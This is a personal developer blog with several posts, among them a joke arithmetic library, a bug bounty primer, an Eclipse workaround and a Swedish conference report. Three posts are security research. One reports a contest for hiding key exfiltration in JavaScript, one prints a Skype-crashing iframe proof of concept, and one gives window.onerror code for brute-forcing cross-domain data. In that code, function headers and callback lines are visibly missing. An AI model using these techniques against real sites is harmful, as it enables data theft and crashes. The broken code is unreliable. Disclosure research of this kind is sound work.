The Java Hacker – Peter Jaric's Blog

### Mathemancy.js – a Framework for Natural Language Arithmetic in JavaScript

A while ago, while I was riding my bike to work, I thought: “Would it possible to make one.plus.two.times.three evaluate to 7 in JavaScript?” I wanted to see if it was possible, and with some invaluable help from Mathias Bynens and Ingvar Stepanyan I was able to make it work.

I give you:

## Mathemancy.js

With mathemancy.js , you can write your arithmetic expressions using natural language in property access notation (this was the hard part). Great, huh? Some examples:

three.plus.two === 3 + 2
two.three.minus.four === 23 - 4

var result = six.dividedBy.two.minus.nine.times.four;
result === 6 / 2 - 9 * 4

Please try it out yourself over at the small test bed I created for this purpose.

### Limitations

It is not possible to write for example minus.two, or just two.

Neither parentheses nor other notation except +, -, * and / is supported.

This won’t work:

var forty = five.times.eight;
var fortytwo = forty.plus.two;

### Code

All code can be found at Github: https://github.com/peterjaric/mathemancy.js

Please feel free to create pull requests! Look at the Limitations section for inspiration. ;)

### Seriously?

This is a joke framework of course, but the code works, try it out yourself!

### 7 Reasons Why You Should Become a Bug Bounty Hunter

A while back, Gregoire Gilbert and Johannes Ridderstedt (then Lundberg) of the Uppsala Tech community asked me if I could write an article about bug bounty hunting for their upcoming magazine The Uppdate. Its first issue is now available at http://theuppdate.com and I’m very proud the be part of it. I recommend you to go there and download it to read the rest of the articles.

Uppsala Tech is a community that aims to advance the tech and entrepreneur scene in Uppsala, Sweden. Have a look at their site, and if you work in or with Uppsala tech, please have a look at http://www.uppsalatech.se and join the Uppsala Tech Slack group.

Without further ado, here is my text:

# 7 Reasons Why You Should Become a Bug Bounty Hunter

(First published in The Uppdate #1)

Software security is an increasingly important aspect when developing applications and other computer related products (such as IoT devices). The last few years more and more companies are trying out something called Bug Bounty Programs to make their software more secure.

The bug bounty programs allow anyone with sufficient skill to hack into systems and products owned by the company, as long as any security holes are reported to the company before disclosing them publicly. Often such reports are rewarded with money or swag (T-shirts, stickers, etc.) Those who find and report vulnerabilities are called researchers or white hats.

Why (should you do it)?

There are many reasons you should consider becoming a bug bounty hunter.

You will:

Gaining knowledge about how to break applications built by others will increase your security awareness when building your own applications.
2. Earn money
Many bug bounty programs pay from \$100 and upwards. If you for example manage to find an XSS in a Google site you will probably be rewarded with \$3,133.7 or more.
3. Have fun
The reason something is fun is bound to be different for each person, but imagine playing an advanced game that only a few people in the world are capable of, and when you succeed in conquering a particular challenge, you receive thanks and money. Sounds great, doesn’t it?
4. Use skills you already have, if you are a programmer
Programmers know how applications are built and in particular they know the shortcuts developers take, which may introduce vulnerabilities. I believe this gives programmers an edge over other hunters.
5. Make the world more secure
Many researchers are driven by this point, to improve security for everyone. Sometimes you find something that you know would have been a disaster for lots of users if it would have been found by an evil hacker (also know as a black hat). Reporting something like that feels good and motivates the company to keep their bug bounty program running.
By publishing your findings and ranking high on top lists you will display your skills to current and future employers. This may help you raise your salary or land you a new job.
There are lots of interesting people in the bug bounty community who gladly share their knowledge and are open for questions and even meeting up in real life.

What (should you look for)?

So, what kind of vulnerabilities are we talking about? In general, anything that allows you to do something you shouldn’t be able to do. Some of the usual vulnerabilities are:

• XSS – Cross Site Scripting. Injecting JavaScript code into a web page that another user is visiting.
• SQLi – SQL Injection. Injecting SQL commands into a SQL query that is run against a production database.
• RCE – Remote Code Execution. Running your code or commands on someone else’s server.
• IDOR – Insecure Direct Object References. When you access secret data by manipulating an ID (e.g. ?id=1234 -> ?id=1233).
• CSRF – Cross Site Request Forgery. Executing actions on another user’s behalf by secretly submitting a form to another site.

These are all web applications vulnerabilities, but all kinds of security holes are interesting, of course. Read more about web vulnerabilities at the OWASP Top 10 (see the Links section below).

How (do you do it)?

First, learn how to exploit IDOR, then CSRF vulnerabilities, they are common and easy to understand. To find an insecure direct object reference, all you have to do is to change a parameter in a URL (or sometimes in a POST request) to something that is not yours and see if you are allowed to access it anyway.

When you feel more confident, you can try out XSSes. These are also very common. Since they run in the browser, you can often find them without affecting other users. Begin by trying one of several online challenges, for example the XSS Game by Google (see the Links section below). When you get the hang of how to find XSSes, you can expand into other types. Recently, Krzysztof Kotowicz from Google held a presentation where he listed the things Google are looking for. Take a look at the slides (see the Links section).

So, you have found your first vulnerability, and now it is time to report it. This is mostly done through either special forms or plain old email. It is important to write a good report that make the vulnerability easy to reproduce and assess, but on the other hand, that is all you will have to do, except for confirming that the vulnerability has been fixed. No regression testing, no complete coverage, just report the bug and you’re done!

There are chiefly two types of programs: self-hosted, for example Google’s and Facebook’s programs, and managed programs. The latter kind of programs are run through “bug bounty platforms” where all communication and payment is done through a company specializing in bug bounty programs. The big platforms are HackerOne, Bugcrowd, Cobalt, and Synack. Create an account on each platform and look through their programs. You might be familiar with some of the sites that are targets, and that always helps a lot when trying to figure out what might be possible to abuse.

Who (are doing it)?

Bug bounty hunting is an international phenomenon, but there are several very skilled and high ranking bug bounty hunters from Sweden. I’m not going to mention any names, because that would probably mean I would forget someone. Take a look at the leader boards of the platforms to see who currently rank among the top hackers in the world: http://hackerone.com/thanks, http://bugcrowd.com/leaderboard, and https://cobalt.io/researchers (Synack has no top list, since they are rather secretive).

Hopefully this has inspired you to go looking for security holes. Before you know it you will receive a mail announcing your first bug bounty!

Bug bounty platforms

https://hackerone.com

https://bugcrowd.com

https://cobalt.io

https://www.synack.com

Bug bounty programs

Bugcrowd’s big list of bug bounty programs:

https://bugcrowd.com/list-of-bug-bounty-programs

HackerOne’s directory with more than 1000 companies:

https://hackerone.com/directory

Miscellaneous

OWASP Top 10:

https://xss-game.appspot.com

Secrets of Google VRP. The bug hunter’s guide to sending great bugs:

HackerOne’s resources for new hackers:

https://hackerone.com/blog/resources-for-new-hackers

Bugcrowd’s “How to become a Bug Bounty Hunter”:

https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter

Swedish podcast Säkerhetspodcasten interviewing Frans Rosén about bug bounties:

http://sakerhetspodcasten.se/pods/sakerhetspodcasten-avs-52-bug-bounties-med-frans-rosen

Thanks to Frans Rosén, Mathias Karlsson, Mikael Weckstén, Linus Särud and Mårten Mickos for very helpful feedback on this text.

### Eclipse on a high DPI display (in Windows)

My work laptop is a Dell XPS 15 running Windows 10 with a high resolution display (3840×2160). Since everything becomes so small when using standard 100% zoom I have enabled a custom scaling factor (it says 350% in the settings, but I believe I actually set it to 200%). This works fine for most apps, but not Eclipse (Luna), where all icons become very very tiny.

This is known and there is a bug report for it. According to a comment at the end of the bug report this is to be resolved in a later version of Eclipse soon, but until then, or if you’re stuck in an older version, here is a workaround. I am not exactly sure where I found it, maybe i the StackOverflow-question I referenced, but I’ve also added instructions to it for those occasions when it stops working. This helped me today!

Create a file called eclipse.exe.manifest in the same folder as the eclipse.exe binary, containing this:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<!-- If this stops working, you must create the PreferExternalManifest registry entry. To do this, follow these steps:

Click Start, click Run, type regedit, and then click OK.
Locate and then click the following registry subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide
On the Edit menu, point to New, and then click DWORD Value.
Type PreferExternalManifest, and then press ENTER.
Right-click PreferExternalManifest, and then click Modify.
In the Edit DWORD Value dialog box, click Decimal under Base.
In the Value data box, type 1, and then click OK.
On the File menu, click Exit to close Registry Editor.

https://support.microsoft.com/en-us/kb/912949
-->

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">

<description>eclipse</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel xmlns:ms_asmv3="urn:schemas-microsoft-com:asm.v3"
level="asInvoker"
ms_asmv3:uiAccess="false">
</requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>

<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="http://schemas.microsoft.com/SMI/2005/WindowsSettings">false</ms_windowsSettings:dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>

### An Øredev 2015 summary – Swedish only

This is a report about Øredev 2015 that I posted on my employer’s intranet. Due to the huge demand I asked if I could publish it on the internet. Unfortunately it is available in Swedish only.

I våras råkade jag hitta ett säkerhetshål på utvecklarekonferensen Øredevs webbplats. Som tack för hjälpen fick jag en gratisbiljett och tre dagar i förra veckan var jag där och insöp nya intryck och ny kunskap. Det var hela åtta spår, så jag fick försöka plocka russinen ur kakan. Jag ska här försöka sammanfatta det jag tyckte var mest intressant och relevant för oss på systemutvecklingsenheten. Jag skriver alltså lite olika mycket om sessionerna, beroende på hur mycket jag tycker det finns att föra vidare. Vissa sessioner skippar jag helt (t ex “Unleash your inner console cowboy” som visade sig gå igenom grunderna i BASH…).

Dags att ta reda på om jag fick med mig någon kunskap och inte bara en påse freebies, alltså.

Själva konferensen var proffsigt arrangerad och ganska intensiv, det fanns t ex ingen dedikerad lunchpaus – man fick ta det mellan passen eller skippa ett pass helt (men det kunde jag inte med så det blev att slänga i sig maten). Utbudet var varierat, det är ju inte en konferens inriktad på ett visst språk, men det var som vanligt nuförtiden övervikt åt webbutveckling.

Alla (eller nästan alla) sessioner finns uppladdade på Vimeo här: https://vimeo.com/user4280938/videos och schemat finns här: http://oredev.org/2015/schedule. Vissa talare har lagt upp sina slides på nätet, och då har jag länkat till dessa, men oavsett så finns slidesen inlagda i varje video.

### David Anderson – Social engineering for/with/using Kanban

En speciell sak med Øredev var att dom körde med två keynotes per dag, ett inledande på morgonen och ett avslutande på kvällen. Detta var den första keynoten på hela konferensen.

David Anderson är tongivande bakom den agila metoden Kanban och han började med att berätta hur människor styrs av sitt behov av att tillhöra en grupp och slutade med att beskriva hur dom tänkt inom Kanban-rörelsen för att undvika de problem man kan hamna i om grupptänkandet får ta överhanden.

Delen om grupptänkande var rolig och tankeväckande, men hur mycket källor han hade på det han sa vet jag inte. Men det klingade rätt att, om man har en organisation med tydliga roller och regler kring vad som avgör om man är med eller inte så blir det svårare att vara nytänkade, eftersom man då riskerar att förlora sitt medlemskap i gruppen. Och motsvarande, att om organisationen har högt i tak och inte är så hård på vem som får vara med och vem som gör vad, så finns det en bra grund för innovation, men gruppens medlemmar är samtidigt inte lika lojala och kan lämna gruppen när dom har lust.

Inte så överraskande berättade David att ett mål med Kanban var att ha den andra typen av organisation, och han nämnde bl a en händelse där dom största Kanban-fansen vill starta något dom kallade Kanbanistas där man uppenbarligen skulle få vara med om man gillade Kanban väldigt mycket. Detta var motsatsen till vad David var ute efter och han “stampade ut det snabbt”.

Titeln på presentationen antyder att Kanban kan användas för “social engineering” på olika sätt, och ett exempel som direkt skulle kunna vara applicerbart på hur mitt team (Gemensamma webbfunktioner) arbetar är att använda maxantalet tillåtna ärenden i en kolumn på tavlan till att tvinga fram samarbete. Om man har 5 utvecklare och max satt till 3 så måste man antingen välja att sitta tillsammans och jobba eller att göra ingenting, vilket snabbt kommer att märkas. Jag vet inte just om jag skulle rösta för en sådan implementation av maxregeln, dock ;)

En annan sak som slog mig när jag lyssnade är att vi i mitt team säger att vi kör Kanban, men det är nog bara en liten delmängd av vad Kanban kan vara. Först kändes det lite kasst, men allt eftersom förstod jag att så behöver jag inte känna. Dels så är en grund i Kanban att börja med den process man har och inkrementellt förändra den, samtidigt som man respekterar de roller som redan finns, och dels så finns det inga Kanbanbutts (se The Scrumbutt Test, http://www.leanagiletraining.com/better-agile/the-scrumbutt-test/), just för att det ska vara lätt att komma igång och vara med.

David Anderson var rolig att lyssna på (som en keynote-talare ska vara), så jag rekommenderar att ta en titt när videon dyker upp.

Slides här: http://www.slideshare.net/agilemanager/social-engineering-with-in-for-kanban

### Todd Gardner – JavaScript Forensics

Todd Gardner ligger bakom https://trackjs.com och i den här presentationen gick han igenom olika vanliga JavaScript-felmeddelanden, vad dom beror på och vad man kan kan göra åt dom. T ex så kan en inkluderad javascriptfil misslyckas att laddas och då brukar man få massor av fel i sina JavaScript-loggar (om man sparar undan dom). Kolla gärna igenom presentationen om ni har mycket JavaScript-kod.

### Bruno Borges – Nashorn: Javascript on JVM, from Scripts to Full Apps

Här fick vi se hur man använder JavaScript infrån Java och Java inifrån JavaScript. Det låter kanske lite krystat, men om man gillar själva språket JavaScript, men vill ha tillgång till Javas stora bibliotek av klasser så är det en mycket bra kombination. Speciellt via kommandot jjs som jag inte kände till tidigare.

Man kör jjs från kommandoprompten, antingen utan argument och då kommer man in i ett interaktivt läge, eller med filnamn som argument och då körs koden som finns i filen. En konsekvens av detta är att man kan använd jjs/JavaScript i shellscript genom att skriva #!/usr/bin/jjs -fv överst i sin skriptfil. Såvitt jag förstår funkar detta bara i Java 8 och framåt.

Hittar tyvärr inga slides.
Video: https://vimeo.com/144703271

### Niall Merrigan – Website Fuzzies

Niall gick igenom en grupp verktyg och plattformar som man som utvecklare kan använda för att automatiskt säkerhetstesta sina webappar innan man släpper ut dom i produktion. Det är ju redan lite mitt område, men Nialls poäng var att alla utvecklare borde lära sig några av dom här verktygen, att det kommer krävas eller redan krävs av oss att vi hittar säkerhetsproblem redan i utvecklingsfasen. Han visade ganska många verktyg som jag aldrig använt, så det var lärorikt.

Hittar tyvärr inga slides här heller.
Video: https://vimeo.com/144674803

### Honza Král – Collect all the data!

Den här killen kommer från företaget som gör ElasticSearch, så presentationen snurrade runt den produkten och två andra i deras portfolio, LogStash och Kibana. Alla dessa är open source, vad jag förstår, och koncepten var allmänna, så presentationen var ändå intressant.

Den springande punkten var att man ska spara alla händelser från sina applikationer och servrar i en central (men distribuerad och felsäker såklart) logg och sedan koppla på en kapabel sökmotor och ett visualiseringsgränssnitt. På så sätt kan man felsöka och analysera vad som har hänt vid olika problem.

Man kan också använda sökmotorn för att få ut data som kan används i applikationerna. Honza exemplifierade detta med en rekommendationsmotor för musik. Alla lyssnings-händelser sparas i loggen och sedan kan man använda sökmotorn för att ta fram musik som användaren borde gilla, baserat på andra användare med samma musiksmak. Det här var väl egentligen mest en demo av vad ElasticSearch klarar.

Däremot gillar jag idén att logga till en gemensam logg, för att förenkla felsökning. Och gärna att man loggar just händelser av olika slag, så att man kan koppla det till de vanliga felmeddelanden man har i loggen. T ex att man loggar när användare utför operationer man vet är tunga och hur många som är inloggade just nu, osv.

Inga slides, tyvärr.
Video: https://vimeo.com/144676868

### Emil Kvarnhammar – The Most Dangerous Software Errors

Detta var en ganska konventionell säkerhetsdragning där Emil gick igenom olika typer av sårbarheter, men istället för att plocka dessa från OWASP Top 10, som är brukligt, använde han CWE/Sans Top 25. Jag sammanfattar det hela med ett citat han hade med i sina slides:

If you know the enemy and know yourself, you need not fear the result of a hundred battles.

Sun Tzu, The Art of War

Här fattas slides, igen.
Video: https://vimeo.com/144645134

### Amy Phillips – Making Continuous Delivery work for you: An Experience Report

Amy Phillips berättade om hur hennes företag SongKick förändrat sin release-process för att kunna driftsätta ofta och lätt. Jag antecknade ganska frenetiskt, trots att ämnet inte var James Bond-spännande direkt, och här kommer ett antal saker hon rekommenderade/påstod:

• Ha inte samma process för alla sorters fixar. En liten buggfix ska inte behöva gå igenom samma steg som en ny feature.
• Utvecklarna ska vara ansvariga för kvalitén i produktion, det ansvaret ska inte ligga bara på test och någon som signerar releasen.
• Innan en ny feature börja utvecklas, ha ett möte med alla intressenter, så att det blir rätt grej. (Här tycker jag att det agila arbetssättet kunde ha poängterats mer, ett möte räcker väl inte?)
• Ha en gemensam överenskommen test-strategi i hela teamet så att det inte beror på person hur vältestat något blir.
• Skapa värderingen “Utvecklingsteamet är ansvarigt för sin egen testning”. Alltså inte individerna, utan hela teamet.
• Viktigt att skilja på testning och checkning, där det första är letande efter fel och det senare är en ren koll att det är rätt sak som utvecklats.
• Fördelen med continuous delivery och automatisk testning är att man får väldigt snabb feedback.
• Eftersom dom releasar mycket oftare så kommer det med ofärdig kod till produktion och därför använder dom feature flippers mycket mer.
• Dessa flippers kan vem som helst som har adminrättigheter slå av och på i deras adminverktyg.
• Dom har mottot “You can break anything once“.
• Man ska ha snabba och underhållna automatiska tester, för att slippa de tidsödande manuella testerna innan release.
• I och med att dom kan releasa så fort så kan vissa buggfixar komma ut på bara minuter. Det ger en väldigt bra releation till kunderna.
• För att komma till detta nirvana (min formulering) så ska man ta tag i det största problemet som hindrar teamet först, och sedan det näst största, osv…

Trist att det finns så lite slides.
Video: https://vimeo.com/144828003

### Chris Noessel – A Model of Agentive Interaction (through 2 examples)

Det här visade sig inte vara jätterelevant för vårt dagliga arbete, men det var ändå en väldigt intressant föreläsning om hur två olika “agenter” (typ som i “mjukvara som utför en uppgift å användarens vägnar utan att behöva så mycket direkt styrning”) fungerar. En av dessa agenter var den lilla svenskutvecklade kameran Narrative (tidigare Memeto). Se presentationen om du tycker det låter intressant.

Hittar inga slides.
Video: https://vimeo.com/144799183 (detta visade sig vara presentation 2, del 1 finns här: https://vimeo.com/144687906)

### James Turnbull – Orchestrating Docker

Docker är en intressant lösning för att köra lättviktsbehållare med operativsystem, servar och applikationer. Man kan köra det som en utvecklingsmiljö som är förutsägbar; varje gång man drar igång den är det samma mjukvara som körs. Man kan också köra Docker i produktion. Den här presentationen handlade om hur man kan köra flera docker-behållare och relatera dessa till varandra. T ex om man har flera applikationsservrar, två databaser, etc. Det finns flera olika verktyg som varierar i komplexitet.

Det enklaste verkar vara docker-compose, där man i princip verkar behöva en enda konfigurationsfil som beskriver hur servrarna hänger ihop. Nackdelen med detta verktyg är att det endast stödjer en värddator. Vill man köra sina docker-behållare på flera olika datorer behövs något annat.

Verktygen som löser detta är Docker Machine, Docker Swarm, Kubernetes och Mesosphere (se videon för beskrivningar och demos).

### Henry Stapp – DevOps in Large Companies… Is it Possible?

Kan man få till DevOps i en stor organisation? Henry Stapp la 40 minuter på att berätta hur han tycker man ska göra.

Enligt honom så är det främst inte tekniska hinder som finns, utan kulturella. Eftersom dom flesta i större organisationer är rädda att få skulden om något går fel och eftersom det kan bli stora effekter av förändringar så krävs det möten och olika kontrollpunkter får att få igenom saker, vilket förhindrar innovation och smidighet. Därför ska man jobba med systemet och inte agera rebell, för då riskerar man att sätta igång organisationens immunförsvar (och bli omplacerad eller motarbetad på olika sätt).

Olika saker att tänka på:

• Försök automatisera kontrollpunkter.
• IT ses ofta som en kostnad, inte en konkurrensfördel.
• När man sätter upp DevOps-gränssnitt ska dom fungera för alla utvecklare, inte bara elitutvecklarna som har koll på allt.
• Det finns ofta stora mängder legacysystem som man måste ta hänsyn till.
• Även om det är svårt att förändra så måste man, annars kommer det någon mer rörligare uppstickare och äter upp en.
• Det kommer inte hända om inte utvecklarna driver det och kommunicerar uppåt.
• Gör det som skunk works, skapa sandboxar som är lätta för andra att prova devops i.

Slides: nej
Video: https://vimeo.com/145052084

### Martin Kleppmann – Streams as the team interface

Idén i denna presentation var att använda en central logg (i det här fallet nämndes Apache Kafka) att logga alla händelser till. Denna logg kan sedan andra delar av ett system (om man byggt upp det av fristående delar, som microservices ungefär) konsumera istället för att ha direkt kontakt med källan. Till skillnad från många andra mer konkreta presentationer var den här mer framåtblickande.

Exemplet han hade var att en databas loggar alla skrivningar till den centrala loggen och sedan läser en server som skapar ett index loggen från start till slut. Vill man senare skapa ett nytt bättre index så är det bara att läsa loggen från start till slut igen, och sedan peka om användarna mot det nya indexet.

Martin uttryckte det så här: “Like UNIX pipes, but for distributed data”. P g a att man på detta sätt kopplar olika subsystem fria från varandra, är detta något man kan använda för att låta olika team jobba mot varandras delsystem mycket smidigare.

### Üstün Özgür – Standing on the Shoulders of Giants or How to Read the Internals of React.js

Här fick vi veta varför och hur man ska läsa andras kod, specifikt kod i bibliotek man använder. Bl a nämnde han kommandot “ag” som ska vara bättre än grep för just källkod (jag provade det nyss och det verkar faktiskt riktigt bra).

### Aaron Gustafson – There Are No “Buts” in Progressive Enhancement

Det här var en ganska praktisk snabbkurs i hur man i lite olika scenarier kan få en webbplatsupplevelse som är bra, oavsett om man JavaScript fungerar perfekt eller om man använder en fullbredd-webbläsare eller inte. Särskilt gillade jag hur han beskrev hur man kunde göra en loginruta som gömdes och visades bara med hjälp av CSS (http://www.slideshare.net/AaronGustafson/there-are-no-buts-in-progressive-enhancement-redev-2015/36).

### Keynotes generellt

Øredev verkar ha som koncept att deras keynotes ska vara inspirerande, men inte tvunget kopplade till utveckling, och det gillade jag. Vi fick höra om självkörande bilar, hur man försöker återskapa utdöda djur och om hur filmen Kung Fury kom till, bland annat.

Det var alltså inte bara så här:

### The First JavaScript Misdirection Contest

Finally we have a winner!

But first, some background. One month ago, on the 29th of August, I announced the JavaScript Misdirection Contest:

There is a programming contest called The Underhanded C Contest. In their own words, it is “an annual contest to write innocent-looking C code implementing malicious behavior”. I am very much intrigued by that concept, but as my C-skills have declined considerably, I recently wished that there also was a JavaScript version. Pepe Vila suggested that I should start one myself, and here it is.

In short, the goal of the contest was to write code that generated a key for a made-up crypto coin called VDC, and at the same time include hidden code to send that key to your own server. Read more about it, and all the rules, over at misdirect.ion.land.

The kind people over at Detectify (who make a great web based security scanner) donated the first prize, a cool pentesting device called the USB Rubber Ducky Deluxe.

The contest ended the 13th of September, and at that time I had got 40 submissions, of which 34 were valid. The number of submissions and the nice comments I got from the contestants made the contest a success to me.

## The winner

And now to what you’ve all been waiting for, the results. I have decided to award the first prize in the JavaScript Misdirection Contest #0 to…

Aymeric Beaumet!

Congratulations!

I liked his submission because it is short and still manages to include hidden evil code. Most other contest submissions were far longer. You can check out his entry over here: http://jsfiddle.net/c6z0kb4g/0 I’ve included Aymeric’s own description of his submission, but not right here.

The runner-up is Jesse Eedrah, who used a cool unicode trick to misdirect the reader. You can find it here: http://jsfiddle.net/afswj8cL/0 Jesse also put an explanation at GitHub: https://github.com/eedrah/Javascript-Misdirection-Entry

At the end of the post follow the other entries (except for a few who wished to be removed from this list). Do you think I made the right choice, or is there a more worthy winner?

## Submitted code

Some random thoughts about the submissions:

• Many contestants hid the evil code in a Base64-encoded block, often masked as a seed or key.
• Using Image.src as a way to send the key was very common. I also used it in my example, maybe that was the reason.
• Another trick used by more than one, was to include a link to StackOverflow in a comment. I think that was quite clever, because as a code reviewer (and creator) I am used to find these kind of comments that explain unusual code.
• Generally I find it easier to skip over code that has a good comment above it, so I think that is a good trick too.

## Next time?

This was the first JavaScript Misdirection Contest. That kind of implies that there will be another one. :) Hopefully I will run it again later on, but probably not until next year. I’ve learned a few things from this round; most of all that it takes a lot of time, which I don’t have. So the next time I will try to do things a little differently, and luckily I have a few ideas.

## Thanks

I have not done this all by myself. I’d like to thank Jacob Soo, Jonatan Heyman, Victor Haffreingue, File Descriptor and Detectify.

## Other solutions

These are the other valid submissions (except for those who elected to be removed):

 _nderscore http://jsfiddle.net/now9fmvv/0 A. Levin https://jsfiddle.net/31vnwus9/0 Agop Shirinian https://jsfiddle.net/fs885ys8/0 Aleksandr Belkin http://jsfiddle.net/8tL4m43j/0 Alex http://jsfiddle.net/z4v88k00/0 Andrew Moffat http://jsfiddle.net/xvdmch0s/0 Aymeric Beaumet http://jsfiddle.net/c6z0kb4g/0 Calle Svensson https://jsfiddle.net/qpfs1vjz/0 Carl Zulauf http://jsfiddle.net/nvL6g8xd/0 Craig Spence http://jsfiddle.net/74k2hd7e/0 David G http://jsfiddle.net/w02rdLcn/0 David Roberts https://jsfiddle.net/4nqnhrpp/0 Donald Abrams http://jsfiddle.net/by6ukh09/0 Duncan Hall http://jsfiddle.net/gp80d9pf/0/ Emil Stenström http://jsfiddle.net/6epxLfny/0 Ephi Gabay http://jsfiddle.net/65p7y1xf/0 Eran Schoellhorn http://jsfiddle.net/absf4uur/0 Evan Hahn https://jsfiddle.net/jjr6nfjd/0 Jeka Kiselyov http://jsfiddle.net/pLntoqj0/0 Jesse Eedrah http://jsfiddle.net/afswj8cL/0 Jonas P. Hyatt http://jsfiddle.net/b0cLhfqu/0 Jonathan Mann http://jsfiddle.net/1b41dehs/0 Kaley Crum http://jsfiddle.net/y8L8ar4a/0 Kamil Vavra https://jsfiddle.net/ashvwfz0/0 Kevin Bedi http://jsfiddle.net/esgrdjag/0 Kristov Atlas http://jsfiddle.net/m9qxh8q1/0 Michael Hayes http://jsfiddle.net/n0hLga7p/0 nick http://jsfiddle.net/omeeshu3/0 Olivier Arteau https://jsfiddle.net/watLyqzj/0 Ondřej Žára http://jsfiddle.net/3qgun1u1/0 Peabnuts123 http://jsfiddle.net/fgw464v5/0 poerhiz http://jsfiddle.net/a39qwbv7/0 @devsbh https://jsfiddle.net/4je730xn/0 Stephen Checkoway http://jsfiddle.net/ptgru5du/0 Timo Kissing http://jsfiddle.net/sk7c3o57/0

## Aymeric’s tricks

The tricks behind his solution, in his own words:

– perform a request leveraging Image.src
– generate the seed as being `src`
– use the seed to generate the domain name (src.sr)
– obfuscate the url construction as if it was the hash

Will send the generated key to __generated_key__.src.sr (necessitate the proper DNS Cname wildcard)

### Crashing Skype with a Malicious URL

Some time ago I noticed that it is possible to create Skype links for starting a chat with your account. This is how one of these URIs would look:

I started to play around with this and soon noticed that if you changed the “T” to a “U” and opened the URL in your browser (Chrome or Firefox, strangely it didn’t work on IE), Skype would hang or crash (after allowing Skype to open it, if that wasn’t previously set to yes as default). As I have near to zero experience with exploiting that kind of thing, and since I didn’t have time to learn it right then, I just sent this simple PoC to Microsoft Security:

<iframe src="skype:%23 SECURITY UPDATE %2F%24*U%3B 2015 ?chat">

(I tried to make a convincing message to trick the user into clicking OK, but that’s only necessary if Skype isn’t allowed to open Skype-URIs already.)

A little while ago I got this back from them:

We have completed our investigations regarding the issue you have reported and it has been fixed. We will be acknowledging your name in our Security Researchers webpage for the month of March.

It was interesting to see if a flaw in a desktop app would give me something more than a Hall of Fame mention, but I guess you need to at least provide some kind of exploit for that.

(For the record, Microsoft Security told me it was OK to post this.)

### Using window.onerror to Brute-force Cross Domain Data (updated)

Update:

I got a lot of interesting comments on Twitter about this post, and among them the obvious problem that this approach is slow. Then it hit me, I can do this as a binary search to make it much more efficient. By doing this, I am able to brute force 1 million guesses in about 5 to 10 seconds. It’s not extremely fast, but depending on the application, it can be enough. Here’s the revised code that does this:

// Load a script from a url and then call the callback
// From http://stackoverflow.com/a/950146/185596
{
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = url;
}

function binarySearch() {
var i, split, next;

if (wasDefined && defined.length === 1) {
console.timeEnd("binarySearch");
} else if (!wasDefined && notDefined.length === 1) {
console.timeEnd("binarySearch");
} else {
// Remove the previously checked secrets
for (i = 0; i < defined.length; i++) {
delete window[defined[i]];
}

// No we want to go on checking the defined variables if the
// secret was defined or the undefined variables if the secret was
// not defined.
next = wasDefined ? defined : notDefined;

// Split the array in two halves, one that we will define (in the
// global object), and one that we will not define.
split = Math.floor(next.length / 2);
defined = next.slice(0, split);
notDefined = next.slice(split, next.length);

// Define the variables from the "defined" array.
for (i = 0; i < defined.length; i++) {
window[defined[i]] = 0;
}

// Assume that we will find the secret in the "defined" array.
// window.onerror will set wasDefined to false if it is called.
wasDefined = true;

// Load the url where the secret is
}
}

window.onerror = function() {
// If we ended up here, we got a ReferenceError. That means the
// secret was not defined in the global object.
wasDefined = false;
// Suppress the default error handling
return true;
}

var notDefined = [], defined = [], wasDefined = false;

// For testing the solution, seed with a lot of incorrect guesses
for (i = 0; i < 1000000; i++) {
notDefined.push('notcorrect' + i);
}

// Add the correct guess somewhere random
notDefined[Math.floor(Math.random() * notDefined.length)] = 'secret2';

// Get rid of any defined properties from previous runs
for (i = 0; i < notDefined.length; i++) {
delete window[notDefined[i]];
}

// Run the algorithm
console.time("binarySearch");
binarySearch();

Original post:

Recently I stumbled across a web site that had some user data accessible by a URL and it was returned like this:

value1, value2

I realized that this is valid JavaScript, being an expression with two variable names. I thought it might be possible to guess the names of those two variables and declare them and then fetch the data as a JavaScript via a script tag on another domain. If we then does not get an error, we guessed correctly! We can detect if we get an error with window.error. See further down for code that does this.

Anyway, since I came up with my own way of brute-forcing cross domain data, I thought I should share the code. It is not a very fast method, and I guess someone already thought of it, like back in 1993, but here it is. It uses the same example data as @avlidienbrunn used.

// Load a script from a url and then call the callback
// From http://stackoverflow.com/a/950146/185596
{
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = url;
}

function checkNext() {
if (success) {
} else {
// Remove the previously checked secret to save memory
delete window[secrets[i]];
i++;
// Define the next secret to check
window[secrets[i]] = 0;
// We'll assume this will be a success. If not, success
// will be set to false by onerror.
success = true;
}
}

var secrets = [ 'secret0', 'secret1', 'secret2', 'secret3' ],
success = false,
i;

window.onerror = function() {
// If we ended up here, we got a ReferenceError and then
// we know that the current guess  was wrong.
success = false;
// Suppress the default error handling
return true;
}

// Get rid of any defined properties from previous runs
for (i = 0; i < secrets.length; i++) {
delete window[secrets[i]];
}

// Start at -1 since checkNext will increase it by 1, to 0
i = -1;
checkNext();

### A JavaScript challenge for Nordic.js

Today and yesterday I’ve been visiting Nordic.js, a Scandinavian JavaScript conference. To celebrate the occasion I made a little JavaScript challenge that I announced at Twitter:

The first one was from Andreas Madsen and it was in line with what I was looking for: changing the text between /* and */.

Then Jonas Magazinius bent the rules (rules that only existed in my mind) with this “feature flag” solution:

This was Mathias Bynens‘ first solution. It was similar to Andreas’ code, but implemented a bit differently.

From Joshua Adams ‏I got this solution that required an HTML context, but was kind of cool anyway:

Mathias sent in some more proposals, getting closer to expected solution, the second being IE 10 only if I got it right. Update: Well, that was wrong, it actually is valid JavaScript. See this page about comment syntax.

While writing this post I got this from File Descriptor, and this was on par with what I was looking for, using the JavaScript feature “Automatic Semi-colon Insertion” and line terminators in a comment:

Finally, the code I wrote that inspired this challenge.

var a = 0, b = 0;
a/*
*/++/*
*/b

vs.

var a = 0, b = 0;
a/**/++/*
*/b

